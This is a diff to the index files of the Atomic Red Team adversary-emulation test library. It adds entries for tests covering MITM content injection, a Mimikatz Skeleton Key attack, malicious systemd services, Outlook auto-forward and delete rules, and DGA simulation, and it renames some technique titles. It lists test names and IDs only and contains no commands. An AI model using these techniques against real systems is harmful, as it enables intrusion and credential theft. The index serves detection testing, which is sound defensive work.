@@ -1484,6 +1500,8 @@ command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test
 command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
 command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
 command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
+command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
+command-and-control,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1832,6 +1850,7 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
 credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
+credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -2254,6 +2273,8 @@ initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Ena
 initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
 initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
+initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
+initial-access,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -196,6 +196,8 @@ persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),
 persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
+command-and-control,T1568.002,Dynamic Resolution: Domain Generation Algorithms,1,DGA Simulation (Python),cc367493-3a00-4c4a-a685-16b73339167c,bash
+command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
 command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
 command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
 command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
@@ -407,6 +409,14 @@ execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with refer
 execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
 execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
+execution,T1569.003,System Services: Systemctl,1,Create and Enable a Malicious systemd Service Unit,e58c8723-5503-4533-b642-535cd20ec648,sh
+execution,T1569.003,System Services: Systemctl,2,Create systemd Service Unit from /tmp (Unusual Location),a1fa406e-2354-4a24-b6d6-94157e7564d4,sh
+execution,T1569.003,System Services: Systemctl,3,Create systemd Service Unit from /dev/shm (Unusual Location),dce49381-a26b-4d95-bdfa-c607ffe8bee5,sh
+execution,T1569.003,System Services: Systemctl,4,Modify Existing systemd Service to Execute Malicious Command,6123928f-6389-4914-8d25-a5d69bd657fa,sh
+execution,T1569.003,System Services: Systemctl,5,Execute Command via Transient systemd Service (systemd-run),a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236,sh
+execution,T1569.003,System Services: Systemctl,6,Enumerate All systemd Services Using systemctl,1e5be8d4-605a-4acb-8709-2f80b2d8ea95,sh
+execution,T1569.003,System Services: Systemctl,7,Enable systemd Service for Persistence with Auto-Restart,2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7,sh
+execution,T1569.003,System Services: Systemctl,8,Masquerade Malicious Service as Legitimate System Service,6fec8560-ff64-4bbf-bc79-734fea48f7ca,sh
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
@@ -454,6 +464,7 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
+initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
 initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -128,6 +128,7 @@ persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with
 persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
 persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
+command-and-control,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
 command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
 command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
 command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
@@ -289,6 +290,7 @@ impact,T1490,Inhibit System Recovery,12,Disable Time Machine,ed952f70-91d4-445a-
 impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
 impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
 impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
+initial-access,T1659,Content Injection,1,MITM Proxy Injection,9b360eaf-c778-4f07-a6e7-895c4f01ac1c,bash
 initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -428,6 +428,7 @@ defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
+defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -814,6 +815,11 @@ persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d
 persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -1005,6 +1011,7 @@ persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
+persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
 persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
@@ -1038,6 +1045,7 @@ command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test
 command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
 command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
 command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
+command-and-control,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1254,6 +1262,7 @@ credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC cal
 credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
+credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -1535,6 +1544,7 @@ initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Ena
 initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
 initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
+initial-access,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -134,7 +134,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,7 @@
 - T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -354,7 +354,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -375,7 +375,7 @@
 # command-and-control
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -519,7 +519,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/esxi-index.md

@@ -31,7 +31,7 @@
 
 # command-and-control
 - T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/google-workspace-index.md

@@ -80,7 +80,7 @@
 - T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/iaas-index.md

@@ -135,7 +135,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,7 @@
 - T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -357,7 +357,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -377,7 +377,7 @@
 # command-and-control
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
